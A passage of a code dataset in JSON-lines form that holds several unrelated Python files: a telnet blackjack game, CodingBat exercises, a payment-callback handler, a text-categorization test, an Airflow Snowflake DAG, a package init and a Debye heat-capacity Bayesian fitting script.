more.\")\n\t\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\t\tif self.check_hand(cpuhand) >= 21: \n\t\t\t\t\t\t\t\tclient_print (\"Well, well. Get ready kid.\")\n\t\t\t\t\t\t\t\taggrobet == True \n\t\t\t\tcheckorraise = get_input(\"Think you have a good hand. Well, ready to put money on it?: \")\n\t\t\t\tif checkorraise == \"y\":\n\t\t\t\t\tcpuraise = random.randint(0,50)\n\t\t\t\t\tif aggrobet == True:\n\t\t\t\t\t\tcpuraise = cpuraise + 100\n\t\t\t\t\tpot += int(cpuraise)\n\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\tclient_print(\"That's my bet.\")\n\t\t\t\t\tplayerbet2 = get_number(\"I think I'll bet: \")\n\t\t\t\t\tplayertotalbet = int(playertotalbet) + int(playerbet2)\n\t\t\t\t\tpot += int(playerbet2)\n\t\t\t\t\tif int(playerbet2) > int(cpuraise):\n\t\t\t\t\t\tclient_print(\"Bold move Kid.\")\n\t\t\t\t\t\tif self.check_hand(cpuhand) < 19:\n\t\t\t\t\t\t\tclient_print(\"I fold\")\n\t\t\t\t\t\t\tcpufold = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tclient_print(\"I'll bite.\")\n\t\t\t\t\t\t\tcpuraise = playerbet2\n\t\t\t\t\t\t\tpot += int(cpuraise)\n\t\t\t\t\t\t\t\n\t\t\tclient_print(\"Time to show our cards\")\n\t\t\tclient_print(\"You've got\")\n\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\tclient_print(\"Here's my cards\")\n\t\t\tclient_print(\"Hand: {} (score {})\".format(cpuhand, self.check_hand(cpuhand)) )\n\t\t\t\n\t\t\tif self.check_hand(hand) == 21 and len(hand) == 2:\n\t\t\t\tclient_print(\"That's Blackjack. Nice one kid\")\n\t\t\t\t\n\t\t\tif self.check_hand(hand) < self.check_hand(cpuhand):\n\t\t\t\tif cpufold == True:\n\t\t\t\t\tclient_print(\"Damn, should've held out.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telif self.check_hand(cpuhand) > 21:\n\t\t\t\t\tclient_print(\"I went bust. Take the pot.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telse:\t\n\t\t\t\t\tclient_print(\"Not quite kid\")\n\t\t\t\t\tclient_print(\"you lost\")\n\t\t\t\t\tclient_print(playertotalbet)\n\t\t\t\t\tmoney = int(money) - int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\t\tcpumoney += int(pot)\n\t\t\telif self.check_hand(hand) > self.check_hand(cpuhand):\n\t\t\t\tif cpufold == True:\n\t\t\t\t\tclient_print(\"Just glad I didn't lose more.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telif self.check_hand(hand) > 21:\n\t\t\t\t\tclient_print(\"You're bust kid. better luck next time.\")\n\t\t\t\t\tclient_print(\"you lost\")\n\t\t\t\t\tclient_print(playertotalbet)\n\t\t\t\t\tmoney = int(money) - int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\t\tcpumoney += int(pot)\n\t\t\t\telse:\n\t\t\t\t\tclient_print(\"You win kid. Good Job.\")\n\t\t\t\t\tclient_print(\"Your winnings, \")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\telif self.check_hand(hand) == self.check_hand(cpuhand):\n\t\t\t\tclient_print(\"That's what's known as a \\\"push\\\", son.\")\n\t\t\t\t\n\t\t\tclient_print(\"I've got this much money left:\")\n\t\t\tclient_print(money)\n\t\t\tclient_print(\"He has this much money left: \")\n\t\t\tclient_print(cpumoney)\n\t\t\tif money < 0:\n\t\t\t\tclient_print(\"You've lost it all Kid, just give up already.\")\n\t\t\t\tGame_Over = True\n\t\t\tif cpumoney < 0:\n\t\t\t\tclient_print(\"Well, I guess that wasn't luck I was feeling. You've bled me dry, nice work, kid.\")\n\t\t\t\n\t\t\t\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n\t \n telnet_server = TelnetServer(\n port=8089,\n address='',\n on_connect=on_connect,\n on_disconnect=on_disconnect,\n timeout = .05\n ) \n logging.info(\"Listening for connections on port {}. CTRL-C to break.\".format(telnet_server.port))\n while SERVER_RUN:\n telnet_server.poll() # Send, Recv, and look for new connections\n kick_idle() # Check for idle clients\n process_clients() # Check for client input\n\n logging.info(\"Server shutdown.\")\n \n\n\n\t\n\t\n","sub_path":"Blackjacktelnet experiment.py","file_name":"Blackjacktelnet experiment.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454483792","text":"#make_bricks\r\ndef make_bricks(small, big, goal):\r\n return goal%5 >= 0 and goal%5 - small <= 0 and small + 5*big >= goal\r\n\r\n#lone_sum\r\ndef lone_sum(a, b, c):\r\n if a==b==c:\r\n return 0\r\n if a==b:\r\n return c\r\n if c==b:\r\n return a\r\n if a==c:\r\n return b\r\n return a+b+c\r\n\r\n#lucky_sum\r\ndef lucky_sum(a, b, c):\r\n if a==13:\r\n a=0\r\n b=0\r\n c=0\r\n if b==13:\r\n b=0\r\n c=0\r\n if c==13:\r\n c=0\r\n sum = a+b+c\r\n return sum\r\n\r\n#no_teen_sum\r\ndef no_teen_sum(a, b, c):\r\n a = fix_teen(a)\r\n b = fix_teen(b)\r\n c = fix_teen(c)\r\n sum = a+b+c\r\n return sum\r\n \r\n \r\ndef fix_teen(n):\r\n if n==15 or n==16:\r\n return n\r\n elif n>=10:\r\n return 0\r\n else:\r\n return n\r\n\r\n#round_sum\r\ndef round_sum(a, b, c):\r\n a = round10(a)\r\n b = round10(b)\r\n c = round10(c)\r\n return a+b+c\r\n \r\ndef round10(num):\r\n if num%10>=5:\r\n num+=(10-(num%10))\r\n else:\r\n num-=(num%10)\r\n return num\r\n\r\n#close_far\r\ndef close_far(a, b, c):\r\n arr = [a,b,c]\r\n arr.sort()\r\n maxi = arr[2]\r\n mini = arr[0]\r\n mid = arr[1]\r\n if (maxi-mid<2 and mid-mini<2):\r\n return False\r\n if (maxi-mid<2 and maxi-mini>=2) or (mid-mini<2 and maxi-mini>=2):\r\n return True\r\n return False\r\n\r\n#make_chocolate\r\ndef make_chocolate(small, big, goal):\r\n maxBig = goal / 5\r\n \r\n if big >= maxBig:\r\n if small >= (goal - maxBig * 5):\r\n return goal - maxBig * 5\r\n if big < maxBig:\r\n if small >= (goal - big * 5):\r\n return goal - big * 5\r\n return -1\r\n\r\n","sub_path":"week8/coding_bat/logic-2.py","file_name":"logic-2.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"262520118","text":"# -*- encoding: utf-8 -*- \r\n\r\nimport traceback\r\nimport os\r\nimport time\r\nimport datetime\r\nimport random\r\nfrom base64 import b64decode\r\nfrom M2Crypto import RSA\r\nfrom apps.common import utils\r\nfrom django.http import HttpResponse\r\nfrom rklib.utils import rkjson as json\r\nfrom rklib.model import storage_context\r\nfrom apps.common.decorators import needuser,session_auth,signature_auth\r\nfrom apps.models.pp_charge import PPCharge\r\nfrom apps.models.account_mapping import AccountMapping\r\nfrom apps.models.charge_record import ChargeRecord\r\nfrom apps.models.user_property_ex import UserPropertyEx\r\nfrom apps.models.redistop import TopModel\r\nfrom apps.models.user_base import UserBase\r\nfrom apps.config import game_config\r\nfrom apps.common.ocstat import oc_stat\r\nfrom apps.views.main import charge_api\r\n\r\ng_rsa_foo = None\r\n \r\n@signature_auth\r\n@session_auth\r\n@needuser\r\ndef generate_billno(request):\r\n #\"\"\"生成订单号\r\n #\"\"\"\r\n data = {}\r\n item_id = request.REQUEST['item_id']\r\n pp_charge_obj = PPCharge.get_instance(request.rk_user.uid)\r\n #删除过期10天\r\n charge_keys = pp_charge_obj.charge_info['charge_record'].keys()\r\n billnos = []\r\n now = datetime.datetime.now()\r\n for i in charge_keys:\r\n if pp_charge_obj.charge_info['charge_record'][i][1] is False:\r\n billnos.append(i)\r\n for i in billnos:\r\n bill_date = pp_charge_obj.charge_info['charge_record'][i][2]\r\n if bill_date + datetime.timedelta(days = 10) < now:\r\n pp_charge_obj.charge_info['charge_record'].pop(i)\r\n \r\n billno = 'pp'+ str(request.rk_user.uid) + str(time.time()) + str(random.randint(1000,9999))\r\n pp_charge_obj.charge_info['charge_record'][billno] = [item_id, False, datetime.datetime.now()]\r\n pp_charge_obj.put()\r\n \r\n data['billno'] = billno\r\n data['user_info'] = request.rk_user.wrapper_info()\r\n return HttpResponse(\r\n json.dumps(data, indent=1),\r\n content_type='application/x-javascript',\r\n )\r\n \r\n \r\ndef decode_pp_callback(data):\r\n \r\n global g_rsa_foo\r\n try:\r\n b64string = b64decode(data)\r\n if not g_rsa_foo:\r\n pem_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'pprsa.pem'))\r\n g_rsa_foo = RSA.load_pub_key(pem_file)\r\n \r\n ctxt = g_rsa_foo.public_decrypt(b64string, RSA.pkcs1_padding)\r\n return 0,json.loads(ctxt)\r\n except:\r\n return 1,{}\r\n \r\ndef ppcharge_result(request):\r\n #\"\"\"pp助手充值\r\n #\"\"\"\r\n status = int(request.REQUEST['status'])\r\n \r\n #已经兑现过了\r\n if status == 1:\r\n return HttpResponse('success')\r\n \r\n #订单验证失败\r\n sign = request.REQUEST['sign']\r\n rc, pp_sign = decode_pp_callback(sign) \r\n if rc or pp_sign == {}:\r\n content = 'pp charge error'\r\n utils.oc_send_mail(request, content)\r\n return HttpResponse('fail')\r\n \r\n #订单是否处理过\r\n billno = pp_sign['billno']\r\n charge_record_obj = ChargeRecord.get(billno)\r\n if charge_record_obj is not None:\r\n return HttpResponse('success') \r\n \r\n #是否是正确的玩家\r\n pid = pp_sign['roleid']\r\n account_mapping_obj = AccountMapping.get(pid)\r\n if account_mapping_obj is None:\r\n return HttpResponse('fail') \r\n pp_charge_obj = PPCharge.get(account_mapping_obj.uid)\r\n if pp_charge_obj is None:\r\n return HttpResponse('fail') \r\n \r\n #这个订单是否是该玩家的\r\n if billno not in pp_charge_obj.charge_info['charge_record']:\r\n return HttpResponse('fail') \r\n \r\n bill_info = pp_charge_obj.charge_info['charge_record'][billno]\r\n if bill_info[1] is True:\r\n return HttpResponse('success')\r\n \r\n #元宝\r\n item_id = bill_info[0]\r\n oid = pp_sign['billno']\r\n\r\n rk_user = UserBase.get(account_mapping_obj.uid)\r\n data = charge_api(request, rk_user, oid, item_id, {\"pp_sign\": pp_sign, \"status\": 0})\r\n# rc = charge_api(account_mapping_obj.uid, item_id, pp_sign)\r\n if data[\"rc\"] == 0:\r\n pp_charge_obj.charge_info['charge_record'][billno][1] = True\r\n pp_charge_obj.do_put()\r\n return HttpResponse('success')\r\n else:\r\n return HttpResponse('fail')\r\n","sub_path":"python/project/card/my_card/apps/views/ppcharge.py","file_name":"ppcharge.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474621297","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n#from __future__ import unicode_literals\n\nimport os.path\nfrom unittest import SkipTest\n\nimport numpy as np\nfrom numpy.testing import assert_allclose, assert_equal\n\nimport pytest\nimport itertools\n\nfrom freediscovery.text import FeatureVectorizer\nfrom freediscovery.categorization import Categorizer\nfrom freediscovery.io import parse_ground_truth_file\nfrom freediscovery.utils import classification_score\nfrom freediscovery.exceptions import OptionalDependencyMissing\nfrom .run_suite import check_cache\n\n\nbasename = os.path.dirname(__file__)\n\n\ncache_dir = check_cache()\n\n\ndata_dir = os.path.join(basename, \"..\", \"data\", \"ds_001\", \"raw\")\n\nn_features = 20000\n\nfe = FeatureVectorizer(cache_dir=cache_dir)\nuuid = fe.preprocess(data_dir, file_pattern='.*\\d.txt', n_features=n_features,\n binary=True, use_idf=False, norm=None)\nuuid, filenames = fe.transform()\n\nground_truth = parse_ground_truth_file(\n os.path.join(data_dir, \"..\", \"ground_truth_file.txt\"))\n\n@pytest.mark.parametrize('method, cv', itertools.product(\n [\"LinearSVC\", \"LogisticRegression\", 'xgboost'],\n #'MLPClassifier', 'ensemble-stacking' not supported in production the moment\n [None, 'fast']))\ndef test_categorization(method, cv):\n\n if 'CIRCLECI' in os.environ and cv == 'fast' and method in ['LinearSVC', 'xgboost']:\n raise SkipTest # Circle CI is too slow and timesout\n\n if method == 'xgboost':\n try:\n import xgboost\n except ImportError:\n raise SkipTest\n\n cat = Categorizer(cache_dir=cache_dir, dsid=uuid, cv_n_folds=2)\n mask = ground_truth.is_relevant.values == 1\n \n try:\n coefs, X_train, Y_train = cat.train(\n ground_truth.index.values[mask],\n ground_truth.index.values[~mask],\n method=method,\n cv=cv)\n except OptionalDependencyMissing:\n raise SkipTest\n\n\n Y_pred = cat.predict()\n X_pred = cat.fe._pars['filenames']\n\n scores = classification_score(ground_truth.index.values,\n ground_truth.is_relevant.values,\n X_pred, Y_pred)\n\n assert cat.get_params() is not None\n\n if method in ['xgboost', 'ensemble-stacking']:\n # this parameter fail for some reason so far...\n return\n assert_allclose(scores['precision'], 1, rtol=0.5)\n assert_allclose(scores['recall'], 1, rtol=0.5)\n assert_equal(cat.get_dsid(cache_dir, cat.mid), uuid )\n cat.delete()\n\n\ndef test_unique_label():\n \"\"\"Check that testing works with only one label in the training test\"\"\"\n np.random.seed(10)\n Nshape = ground_truth.index.values.shape\n is_relevant = np.zeros(Nshape).astype(int)\n scores = classification_score(ground_truth.index.values,\n is_relevant,\n ground_truth.index.values,\n np.random.rand(*Nshape))\n # TODO unused variable 'scores'\n\n\ndef test_ensemble_stacking():\n from sklearn.linear_model import LogisticRegression\n try:\n from freediscovery_extra import _EnsembleStacking\n except ImportError:\n raise SkipTest\n\n st = _EnsembleStacking([('m1', LogisticRegression()), ('m2', LogisticRegression())])\n\n X_train = np.random.randn(100, 5)\n Y_train = np.random.randint(2, size=(100))\n X_test = np.random.randn(20, 5)\n\n st.fit(X_train, Y_train)\n st.predict_proba(X_test)\n\n\n","sub_path":"freediscovery/tests/test_categorize.py","file_name":"test_categorize.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475436934","text":"import logging\n\nimport airflow\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.contrib.hooks.snowflake_hook import SnowflakeHook\nfrom airflow.contrib.operators.snowflake_operator import SnowflakeOperator\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nargs = {\"owner\": \"Airflow\", \"start_date\": airflow.utils.dates.days_ago(2)}\n\ndag = DAG(\n dag_id=\"snowflake_connector\", default_args=args, schedule_interval=None\n)\n\ncreate_insert_query = [\n \"\"\"create table public.test_table (amount number);\"\"\",\n \"\"\"insert into public.test_table values(1),(2),(3);\"\"\",\n]\n\n\ndef row_count(**context):\n dwh_hook = SnowflakeHook(snowflake_conn_id=\"snowflake_conn\")\n result = dwh_hook.get_first(\"select count(*) from public.test_table\")\n logging.info(\"Number of rows in `public.test_table` - %s\", result[0])\n\n\nwith dag:\n create_insert = SnowflakeOperator(\n task_id=\"snowfalke_create\",\n sql=create_insert_query,\n snowflake_conn_id=\"snowflake_conn\",\n )\n\n get_count = PythonOperator(task_id=\"get_count\", python_callable=row_count)\ncreate_insert >> get_count\n","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266289846","text":"# Lib\nfrom logging import NullHandler, getLogger\n# App\nfrom .files import get_sample_sheet, get_sample_sheet_s3\nfrom .processing import get_manifest, get_raw_datasets, run_pipeline, consolidate_values_for_sheet\nfrom .download import run_series, run_series_list, convert_miniml\n\n\ngetLogger(__name__).addHandler(NullHandler())\n\n\n__all__ = [\n 'get_manifest',\n 'get_raw_datasets',\n 'run_pipeline',\n 'get_sample_sheet',\n 'consolidate_values_for_sheet',\n 'run_series',\n 'run_series_list',\n 'convert_miniml'\n]\n","sub_path":"methylprep/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540788635","text":"import matplotlib\r\nmatplotlib.use('tkagg')\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nimport pickle\r\nimport seaborn as sns\r\nimport scipy.stats as ss\r\nimport numpy as np\r\nimport core_compute as cc\r\nimport core_plot as cp\r\nfrom scipy.integrate import simps, cumtrapz\r\n\r\n\r\ndef deb_Cp(theta, T):\r\n T = np.array(T)\r\n T[T < 1e-70] = 1e-70\r\n # ub: array of upper bounds for integral\r\n TT = np.array(theta)[..., None] / \\\r\n np.array(T)[None, ...]\r\n\r\n # nx: number of steps in x integration\r\n nx = 100\r\n\r\n # x: array for variable of integration\r\n # integration will be performed along\r\n # last axis of array\r\n x = np.ones(list(TT.shape)+[nx]) * \\\r\n np.linspace(0, 1, nx)[None, ...]\r\n x *= x*TT[..., None]\r\n\r\n R = 8.314459848 # J/mol*K\r\n expx = np.exp(x)\r\n\r\n # if any elements of expx are infinite or equal to 1,\r\n # replace them with zero. This doesn't change the result\r\n # of the integration and avoids numerical issues\r\n expx[expx > 1e100] = 0\r\n expx[expx - 1 < 1e-100] = 0\r\n\r\n # perform integration over\r\n # the equispace data points along the last\r\n # axis of the arrays\r\n integrand = (x**4)*expx / (expx-1.)**2\r\n integral = simps(y=integrand, x=x, axis=-1)\r\n\r\n return np.squeeze(9*R*((1/TT)**3)*integral)\r\n\r\n\r\ndef feval_Cp(param, T):\r\n\r\n theta = param[..., 0]\r\n a_2 = param[..., 1]\r\n a_3 = param[..., 2]\r\n a_4 = param[..., 3]\r\n a_5 = param[..., 4]\r\n\r\n # R = 8.314459848 # J/mol*K\r\n # frac = theta/T\r\n # expf = np.exp(frac)\r\n # lowT = 3*R*(frac**2)*(expf/(expf-1)**2)\r\n lowT = deb_Cp(theta, T)\r\n\r\n A = lowT + a_2*T + a_3*T**2 + a_4*T**3 + \\\r\n a_5*T**4\r\n\r\n return A\r\n\r\n\r\ndef feval_Cp_plt(param, T, deb):\r\n\r\n # theta = param[..., 0, None]\r\n a_2 = param[..., 1, None]\r\n a_3 = param[..., 2, None]\r\n a_4 = param[..., 3, None]\r\n a_5 = param[..., 4, None]\r\n\r\n \"\"\"Cp for alpha phase\"\"\"\r\n\r\n # R = 8.314459848 # J/mol*K\r\n # frac = theta/T\r\n # expf = np.exp(frac)\r\n # lowT = 3*R*(frac**2)*(expf/(expf-1)**2)\r\n lowT = deb\r\n\r\n A = lowT + a_2*T + a_3*T**2 + a_4*T**3 + \\\r\n a_5*T**4\r\n\r\n return A\r\n\r\n\r\ndef feval_H(param, T):\r\n\r\n theta = param[..., 0, None]\r\n a_2 = param[..., 1, None]\r\n a_3 = param[..., 2, None]\r\n a_4 = param[..., 3, None]\r\n a_5 = param[..., 4, None]\r\n\r\n \"\"\"compute the enthalpy for the alpha phase\"\"\"\r\n\r\n # R = 8.314459848 # J/mol*K\r\n # lowT = 3*R*theta/(np.exp(theta/T)-1.)\r\n\r\n # add on 298.15K to T so that H_298.15 = 0 is enforced\r\n T_ = np.array(list(T) + [298.15])\r\n T = np.atleast_1d(T)\r\n T_ = np.atleast_1d(T_)\r\n\r\n thetam = np.mean(theta)\r\n\r\n # first create equispaced temps at which to eval Cp\r\n T_v1 = np.linspace(1e-10, thetam/8, 30)[:-1]\r\n T_v2 = np.linspace(thetam/8, 3*thetam, 50)[:-1]\r\n T_v3 = np.linspace(3*thetam, 2100, 20)\r\n T_v = np.concatenate([T_v1, T_v2, T_v3])\r\n\r\n # evaluate Debye-Cp term at equispaced points\r\n DebCp_v = deb_Cp(theta, T_v)\r\n # evaluate Debye-Cp term at actual temps\r\n DebCp = deb_Cp(theta, T_)\r\n\r\n # array for H-Debye terms\r\n DebH = np.zeros((theta.size, T_.size))\r\n\r\n # split it up by each temp\r\n for ii in range(T_.size):\r\n # identify number of Temps in T_v less than actual\r\n # temp\r\n idx = np.sum(T_v < T_[ii])\r\n\r\n T__ = np.zeros((idx+1))\r\n\r\n T__[:idx+1] = T_v[:idx+1]\r\n\r\n DebCp_ = np.zeros((theta.size, idx+1))\r\n DebCp_[..., :idx+1] = DebCp_v[..., :idx+1]\r\n\r\n # last temp and Cp are for the actual temp\r\n # of interest\r\n T__[-1] = T_[ii]\r\n DebCp_[..., -1] = DebCp[..., ii]\r\n\r\n # perform numerical integration\r\n DebH_ = np.squeeze(simps(y=DebCp_, x=T__, axis=-1))\r\n DebH[:, ii] = DebH_\r\n\r\n # we subtract debH at 298.15K from debH at all other temps\r\n lowT = np.squeeze(DebH[..., :-1]) - np.squeeze(DebH[..., -1])\r\n\r\n A = lowT + 0.5*a_2*T**2 + (1./3.)*a_3*T**3 + 0.25*a_4*T**4 + \\\r\n 0.2*a_5*T**5\r\n\r\n return A\r\n\r\n\r\ndef feval_H_plt(param, T, deb):\r\n a_2 = param[..., 1, None]\r\n a_3 = param[..., 2, None]\r\n a_4 = param[..., 3, None]\r\n a_5 = param[..., 4, None]\r\n\r\n \"\"\"compute the enthalpy for the alpha phase\"\"\"\r\n\r\n # R = 8.314459848 # J/mol*K\r\n # lowT = 3*R*theta/(np.exp(theta/T)-1.)\r\n\r\n lowT = cumtrapz(y=deb, x=T, axis=-1, initial=0)\r\n A = np.squeeze(lowT) + 0.5*a_2*T**2 + \\\r\n (1./3.)*a_3*T**3 + 0.25*a_4*T**4 + \\\r\n 0.2*a_5*T**5\r\n\r\n T298idx = T == 298.15\r\n A -= A[..., T298idx]\r\n\r\n return A\r\n\r\n\r\ndef likelihood(param, D):\r\n \"\"\"\r\n compute the log likelihood for a set of datapoints given\r\n a parameterization\r\n \"\"\"\r\n dA_Cp = D['At_Cp']-feval_Cp(param, D['Tt_Cp'])\r\n dA_H = D['At_H']-feval_H(param, D['Tt_H'])\r\n\r\n # obtain the hyperparameter vectors for Cp and H\r\n nhyp_H = len(D['name_list_H'])\r\n hyp_H = param[-nhyp_H:]\r\n\r\n nhyp_Cp = len(D['name_list_Cp'])\r\n hyp_Cp = param[-(nhyp_H+nhyp_Cp):-nhyp_H]\r\n\r\n if param[0] <= 0 or np.any(hyp_Cp <= 0) or np.any(hyp_H <= 0):\r\n return -np.inf\r\n\r\n hypvec_Cp = np.zeros(D['Tt_Cp'].shape)\r\n for ii in range(nhyp_Cp):\r\n hypvec_Cp[D['It_Cp'] == ii] = hyp_Cp[ii]\r\n\r\n hypvec_H = np.zeros(D['Tt_H'].shape)\r\n for ii in range(nhyp_H):\r\n hypvec_H[D['It_H'] == ii] = hyp_H[ii]\r\n\r\n dof = 2+1e-6\r\n prob_Cp = ss.t.logpdf(dA_Cp, dof, loc=0, scale=D['Et_Cp']/hypvec_Cp).sum()\r\n prob_H = ss.t.logpdf(dA_H, dof, loc=0, scale=D['Et_H']/hypvec_H).sum()\r\n prob = prob_Cp + prob_H\r\n\r\n if np.isnan(prob):\r\n return -np.inf\r\n\r\n return prob\r\n\r\n\r\ndef get_data(name_list, phase):\r\n\r\n Tt, At, Et, It = [], [], [], []\r\n\r\n \"\"\"load data from the text files\"\"\"\r\n wd = os.getcwd()\r\n os.chdir('data_process')\r\n\r\n for ii in range(len(name_list)):\r\n f = open('%s.csv' % name_list[ii], 'r')\r\n lines = list(f)\r\n f.close()\r\n for jj in range(1, len(lines)):\r\n tmp = lines[jj].split()\r\n if tmp[3] == phase:\r\n Tt += [tmp[0]]\r\n At += [tmp[1]]\r\n Et += [tmp[2]]\r\n It += [ii]\r\n\r\n Tt = np.array(Tt).astype(float)\r\n At = np.array(At).astype(float)\r\n Et = np.array(Et).astype(float)\r\n It = np.array(It).astype(int)\r\n\r\n sorting = np.argsort(Tt)\r\n Tt = Tt[sorting]\r\n At = At[sorting]\r\n Et = Et[sorting]\r\n It = It[sorting]\r\n\r\n os.chdir(wd)\r\n\r\n return Tt, At, Et, It\r\n\r\n\r\ndef WP(msg, filename):\r\n \"\"\"\r\n Summary:\r\n This function takes an input message and a filename, and appends that\r\n message to the file. This function also prints the message\r\n Inputs:\r\n msg (string): the message to write and print.\r\n filename (string): the full name of the file to append to.\r\n Outputs:\r\n both prints the message and writes the message to the specified file\r\n \"\"\"\r\n fil = open(filename, 'a')\r\n print(msg)\r\n fil.write(msg)\r\n fil.write('\\n')\r\n fil.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\"initialize important variables\"\"\"\r\n sns.set(color_codes=True)\r\n np.random.seed(1)\r\n\r\n \"\"\"either load the trace and parameters\r\n or compute from scratch\"\"\"\r\n if len(sys.argv) > 1:\r\n # load the trace and the model\r\n with open(sys.argv[1], 'rb') as buff:\r\n D = pickle.load(buff)\r\n\r\n else:\r\n # for convenience, store all important variables in dictionary\r\n D = {}\r\n\r\n # save the current file name\r\n D['fname'] = sys.argv[0]\r\n\r\n # outname is the name for plots, etc\r\n D['outname'] = D['fname'][:-3]\r\n\r\n # set up a log file\r\n D['wrt_file'] = D['outname'] + '.txt'\r\n fil = open(D['wrt_file'], 'w')\r\n fil.close()\r\n\r\n # name_list: list of the the names of the datasets\r\n # D['name_list'] = ['Ade1952', 'Aru1972', 'Bur1958',\r\n # 'Cag2008', 'Cez1974', 'Col1971',\r\n # 'Fie1961', 'Fil1971', 'Gol1970',\r\n # 'Haw1963', 'Kat1985', 'Kne1963',\r\n # 'Kor2005', 'McC1964', 'Mil2006S1',\r\n # 'Mil2006S2', 'Par2003', 'Pel1971',\r\n # 'Ros2001', 'Wol1957']\r\n D['name_list_Cp'] = ['Ade1952', 'Aru1972', 'Bur1958',\r\n 'Cez1974', 'Col1971', 'Fil1971',\r\n 'Kne1963', 'McC1964','Mil2006S1',\r\n 'Mil2006S2', 'Pel1971', 'Wol1957']\r\n D['name_list_H'] = ['Cag2008', 'Fie1961', 'Gol1970',\r\n 'Haw1963', 'Kat1985']\r\n D['name_list'] = D['name_list_Cp']+D['name_list_H']\r\n nds = len(D['name_list'])\r\n\r\n D['phase'] = 'alpha'\r\n\r\n data = get_data(D['name_list_Cp'], D['phase'])\r\n D['Tt_Cp'], D['At_Cp'] = data[0], data[1]\r\n D['Et_Cp'], D['It_Cp'] = data[2], data[3]\r\n data = get_data(D['name_list_H'], D['phase'])\r\n D['Tt_H'], D['At_H'] = data[0], data[1]\r\n D['Et_H'], D['It_H'] = data[2], data[3]\r\n\r\n D['likelihood'] = likelihood\r\n\r\n # define the prior distributions\r\n D['npar_model'] = 5\r\n D['distV'] = D['npar_model']*['uniform'] + nds*['expon']\r\n\r\n if os.path.exists(D['outname'] + '_prior.csv'):\r\n print('prior suggestions loaded')\r\n nxtprior = np.loadtxt(D['outname'] + '_prior.csv')\r\n D['locV'] = list(nxtprior[0, :D['npar_model']])\r\n D['scaleV'] = list(nxtprior[1, :D['npar_model']])\r\n else:\r\n D['locV'] = [0, -1e-2, -1e-4, -1e-8, -1e-11]\r\n D['scaleV'] = [700, 2e-2, 2e-4, 2e-8, 2e-11]\r\n\r\n D['locV'] += nds*[None]\r\n D['scaleV'] += nds*[None]\r\n D['cV'] = (D['npar_model']+nds)*[None]\r\n D['dim'] = len(D['distV'])\r\n\r\n # sampler: select a type of sampler to evaluate the posterior\r\n # distribution\r\n D['sampler'] = 'pymultinest'\r\n\r\n \"\"\"set up the proper set of variable names for the problem\r\n of interest\"\"\"\r\n D['pname'] = ['theta', 'a_2', 'a_3', 'a_4', 'a_5']\r\n D['pname_plt'] = ['\\\\theta', 'a_2', 'a_3', 'a_4', 'a_5']\r\n\r\n for ii in range(nds):\r\n D['pname'] += ['alpha_%s' % D['name_list'][ii]]\r\n D['pname_plt'] += ['\\\\alpha_{%s}' % D['name_list'][ii]]\r\n\r\n # print(D['pname'])\r\n\r\n D['nparam'] = len(D['pname'])\r\n\r\n \"\"\"run the MH algorithm to sample posterior distribution\"\"\"\r\n\r\n if D['sampler'] == 'kombine':\r\n D = cc.sampler_kombine(D)\r\n elif D['sampler'] == 'emcee':\r\n D = cc.sampler_emcee(D)\r\n elif D['sampler'] == 'pymultinest':\r\n D = cc.sampler_multinest(D)\r\n else:\r\n print('invalid sampler selected')\r\n sys.exit()\r\n\r\n \"\"\"calculate rescaled errors\"\"\"\r\n if 